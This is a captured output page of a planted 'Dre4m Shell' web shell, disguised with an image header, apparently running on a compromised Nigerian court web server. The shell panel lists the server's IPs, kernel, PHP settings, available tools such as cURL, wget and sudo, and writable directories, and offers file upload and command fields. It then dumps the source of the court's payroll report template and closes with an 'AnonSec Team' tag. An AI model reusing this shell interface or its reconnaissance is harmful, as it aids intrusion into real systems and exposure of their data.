ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.148.102.202
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/payrollReport/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/payrollReport/bulkPayroll.blade.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  <link rel="stylesheet" href="{{ asset('assets/css/bootstrap.min.css') }}">
  <link rel="stylesheet" href="{{ asset('assets/font-awesome/css/font-awesome.min.css') }}">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css">
<link rel="shortcut icon" href="images/favicon.ico">
<title>National Industrial Court of Nigeria...::...Payroll Report</title>

<style type="text/css">
<!--
.style25 {  font-family: Verdana, Arial, Helvetica, sans-serif;
  color: #FF0000;
}
a:link {
  text-decoration: none;
}
a:visited {
  text-decoration: none;
}
a:hover {
  text-decoration: underline;
}
a:active {
  text-decoration: none;
}
body {
  background-image: url(asset('Images/nicn_bg.jpg'));
}
.tblborder {
  border-top-width: 1px;
  border-right-width: 1px;
  border-bottom-width: 1px;
  border-left-width: 1px;
  border-top-style: dotted;
  border-right-style: dotted;
  border-bottom-style: dotted;
  border-left-style: dotted;
}

@media print
{    
    .no-print, .no-print *
    {
        display: none !important;
    }
}

body,td,th {
  font-size: 15px;
  font-family: Verdana, Geneva, sans-serif;
}
-->
</style>

<style type="text/css" media="print">
   /* body
    {
        display: none;
        visibility: hidden;
    }*/
</style>

<script type="text/javascript">
   /* $(document).ready(function(){
    
        function copyToClipboard() {
  // Create a "hidden" input
  var aux = document.createElement("input");
  // Assign it the value of the specified element
  aux.setAttribute("value", "Você não pode mais dar printscreen. Isto faz parte da nova medida de segurança do sistema.");
  // Append it to the body
  document.body.appendChild(aux);
  // Highlight its content
  aux.select();
  // Copy the highlighted text
  document.execCommand("copy");
  // Remove it from the body
  document.body.removeChild(aux);
  //ert("Print screen desabilitado.");
}

$(window).keyup(function(e){
  if(e.keyCode == 44){
    copyToClipboard();
  }
}); 




    });*/
</script>

 <script type="text/javascript" src="{{ asset('assets/js/number_to_word.js') }}">
 </script>
</head>


<body background="{{asset('Images/nicn_bg.jpg')}}">
<div align="center">
    <h2>
        <div>NATIONAL INDUSTRIAL COURT OF NIGERIA<br />PAYROLL</div><br />
    </h2>
</div>

<div style="margin-right: 15px;">
@foreach($getBank as $list)
    
    <table width="1802" border="0" cellpadding="0" cellspacing="0" style="font-size:18px" >
      <tr>
        <td>
          Payroll P.V. No:
        </td>
        <td>
          <div align="right">Sheet No:</div>
        </td>
      </tr>
      <tr>
        <td colspan="2">
             <h4>MINISTRY/DEPARTMENT: NATIONAL INDUSTRIAL COURT OF NIGERIA, 
                  @if(session('division'))
                    {{ session('division') }}
                  @endif
                  DIVISION
              </h4>
        </td>
      </tr>
      <tr>
        <td width="">
            <strong>MONTH ENDING:  
                  @if(session('schmonth'))
                      {{ session('schmonth') }}
                  @endif
            </strong>
            <br/>      
        </td>
        <td width="" align="right"></h3>Date Printed: {{ date("l, F d, Y") }}</td>
      </tr>
      <tr>
        <td>
            <strong>
              {{$list->bank ." ". $list->bankGroup}}
          </strong> </td>
        <td>&nbsp;</td>
      </tr>
    </table>
     
    @php

      $bankName            = $list->bank;
      $bankGroup           = $list->bankGroup;
      $data['schmonth']    = $month." ".$year;
      $data['bank']        = $bankName ." ".$bankGroup;
      $allReports          = DB::table('tblpayment')
            ->where('tblpayment.month',     '=', $month)
            ->where('tblpayment.year',      '=', $year)
            ->where('tblpayment.division',  '=', $division)
            ->where('tblpayment.bank',      '=', $bankName )
            ->where('tblpayment.bankGroup', '=', $bankGroup)
            ->orderBy('basic_salary','DESC')
            ->get();

    @endphp


  <table class="table table-responsive" border="1" cellpadding="4" cellspacing="0">
    <thead>
      <tr>
        <td width="44" rowspan="2" align="center" valign="middle"><strong>FILE NO</strong></td>
        <td width="271" rowspan="2" align="center" valign="middle"><strong>NAME</strong></td>
        <td width="23" rowspan="2" align="center" valign="middle"><strong>GL</strong></td>
        <td width="23" rowspan="2" align="center" valign="middle"><strong>ST</strong></td>
        <td colspan="4" align="center" valign="top"><strong>EARNINGS</strong></td>
        <td colspan="12" align="center" valign="top"><strong>DEDUCTIONS 'A' AND 'B'</strong></td>
        <td width="80" rowspan="2" align="center" valign="middle"><strong>TOTAL DEDUCT.</strong></td>
        <td width="70" rowspan="2" align="center" valign="middle"><strong> BASIC ALLOW.</strong></td>
        <td width="70" rowspan="2" align="center" valign="middle"><strong>NET BASIC SALARY</strong></td>
        <td width="70" rowspan="2" align="center" valign="middle"><strong>TOTAL NET EMOLU.</strong></td>
      </tr>
      <tr>
        <td width="75" align="center" valign="middle"><strong>SALARY (BASIC)</strong></td>
        <td width="96" align="center" valign="middle"><strong>ACTING ALLW/<br />
        OVERTIME</strong></td>
        <td width="90" align="center" valign="middle"><strong>ARREARS (BASIC)</strong></td>
        <td width="67" align="center" valign="middle"><strong>GROSS EMOLU</strong></td>
        <td width="41" align="center" valign="middle"><strong>TAX</strong></td>
        <td width="82" align="center" valign="middle"><strong>PENSION</strong></td>
        <td width="43" align="center" valign="middle"><strong>NHF</strong></td>
        <td width="66" align="center" valign="middle"><strong>UNION DUES</strong></td>
        <td width="38" align="center" valign="middle"><strong>UGV</strong></td>
        <td width="52" align="center" valign="middle"><strong>NICN COOP</strong></td>
        <td width="74" align="center" valign="middle"><strong>CTLS LABOUR</strong></td>
        <td width="50" align="center" valign="middle"><strong>CTLS FED SEC.</strong></td>
       
        <td width="85" align="center" valign="middle"><strong>FEDERAL HOUSING LOAN</strong></td>
        <td width="85" align="center" valign="middle"><strong>PHONE CHARGES</strong></td>
        <td width="80" align="center" valign="middle"><strong>P. A. DEDUCT.</strong></td>
         <td width="82" align="center" valign="middle"><strong>SURCHAR.</strong></td>
      </tr>
    </thead>
     
    @php
      $bstotal = 0.00;
      $aatotal = 0.00;
      $abtotal = 0;
      $cetotal = 0;
      $taxtotal = 0;
      $ptotal = 0;
      $nhftotal = 0;
      $udtotal = 0;
      $ugvtotal = 0;
      $nctotal = 0;
      $cltotal = 0;
      $cfstotal = 0;
      $fdtotal = 0;
      $surchargetotal = 0;
      $bicycletotal = 0;
      $pctotal = 0;
      $patotal = 0;
      $tdtotal = 0;
      $mbatotal = 0;
      $gptotal = 0;
      $nptotal = 0;
      $tetotal = 0;
      @endphp
      
           
      @foreach($allReports as $reports) 
             
      
      <tr>
      <td align="right" >{{ $reports->fileNo }}</td>
      <td align="left" valign="middle" nowrap="nowrap">{{ $reports->name }}</td>
      <td width="23" align="center" valign="middle"> {{ $reports->grade }}</td>
      <td width="23" align="center" valign="middle">{{$reports->step}}</td>
      <td width="75" align="right"><?php $bstotal += $reports->basic_salary; ?> {{number_format($reports->basic_salary, 2, '.', ',')}}</td>
      <td width="96" align="right"><?php $aatotal += $reports->actingAllow;  ?> {{number_format($reports->actingAllow, 2, '.', ',')}}</td>
      <td width="90" align="right"> <?php $abtotal += $reports->arrearsBasic; ?> {{number_format($reports->arrearsBasic, 2, '.', ',') }}</td>

      <td width="67" align="right"><?php $cetotal += $reports->cumEmolu; ?> {{number_format($reports->cumEmolu,2, '.', ',') }}</td>
      <td width="41" align="right" valign="middle"><?php $taxtotal += $reports->tax;?> {{ number_format($reports->tax, 2, '.', ',') }}</td>
      <td width="82" align="right"><?php $ptotal += $reports->pension;?> {{ number_format($reports->pension, 2, '.', ',')}}</td>
      <td width="43" align="right"><?php $nhftotal += $reports->nhf; ?> {{number_format($reports->nhf, 2, '.', ',')}}</td>
      <td width="66" align="right"><?php $udtotal += $reports->unionDues;?>{{number_format($reports->unionDues, 2, '.', ',')}}</td>
      <td width="38" align="right"><?php $ugvtotal += $reports->ugv;?> {{number_format($reports->ugv, 2, '.', ',')}}</td>

      <td width="52" align="right"><?php $nctotal += $reports->nicnCoop;?> {{number_format($reports->nicnCoop, 2, '.', ',')}}</td>
      <td width="74" align="right"><?php $cltotal += $reports->ctlsLab;?> {{number_format($reports->ctlsLab, 2, '.', ',')}}</td>
      <td width="50" align="right"><?php $cfstotal += $reports->ctlsFed;?> {{number_format($reports->ctlsFed, 2, '.', ',')}}</td>
      
      <td width="85" align="right"><?php $fdtotal += $reports->fedHousing;?> {{number_format($reports->fedHousing, 2, '.', ',')}}</td>
      <td width="85" align="right"><?php $pctotal += $reports->phoneCharges;?> {{number_format($reports->phoneCharges, 2, '.', ',')}}</td>
      <td width="80" align="right"><?php $patotal += $reports->pa_deduct;?> {{number_format($reports->pa_deduct, 2, '.', ',')}}</td>
      <td width="82" align="right"><?php $surchargetotal += $reports->surcharge;?> {{number_format($reports->surcharge, 2, '.', ',')}}</td>
      
      <td width="80" align="right"><?php $tdtotal += $reports->totalDeduct;?> {{number_format($reports->totalDeduct, 2, '.', ',') }}</td>
      <td width="70" align="right"><?php $mbatotal += $reports->motorBasicAll;?> {{number_format($reports->motorBasicAll, 2, '.', ',')}}</td>
      <td width="70" align="right"><?php $nptotal += $reports->netpay;?> {{number_format($reports->netpay, 2, '.', ',')}}</td>
      <td width="70" align="right"><strong>
        <?php $tetotal += $reports->totalEmolu;?> {{number_format($reports->totalEmolu , 2, '.', ',')}}
      </strong></td>
      </tr>

      @endforeach 

      <br />


      <tr><td colspan="4" align="right"><strong>TOTAL</strong></td>
      
      <td align="right"><strong>{{ number_format($bstotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($aatotal, 2, '.', ',') }} </strong></td>
      <td align="right"><strong>{{ number_format($abtotal, 2, '.', ',') }} </strong></td>
      <td align="right"><strong>{{ number_format($cetotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($taxtotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($ptotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($nhftotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($udtotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($ugvtotal, 2, '.', ',') }} </strong></td>
      <td align="right"><strong>{{ number_format($nctotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($cltotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($cfstotal, 2, '.', ',') }} </strong></td>
      
      <td align="right"><strong>{{ number_format($fdtotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{  number_format($pctotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($patotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($surchargetotal, 2, '.', ',') }}</strong></td>
      
      <td align="right"><strong>{{ number_format($tdtotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($mbatotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($nptotal, 2, '.', ',') }}</strong></td>
      <td align="right"><strong>{{ number_format($tetotal, 2, '.', ',') }}</strong></td>
      </tr>
    </table>

    <br />
    <br />

@endforeach

</div><!--end container-->

<br />

  <div align="center">
    <h2> 
      <a  class= "no-print" type="submit" class="btn btn-success btn-sm pull-right" href = "{{ url('/payrollReport/create') }}">  Back
      </a>
    </h2>
  </div>
<div align="center"></div>

</body>
</html>

Anon7 - 2022
AnonSec Team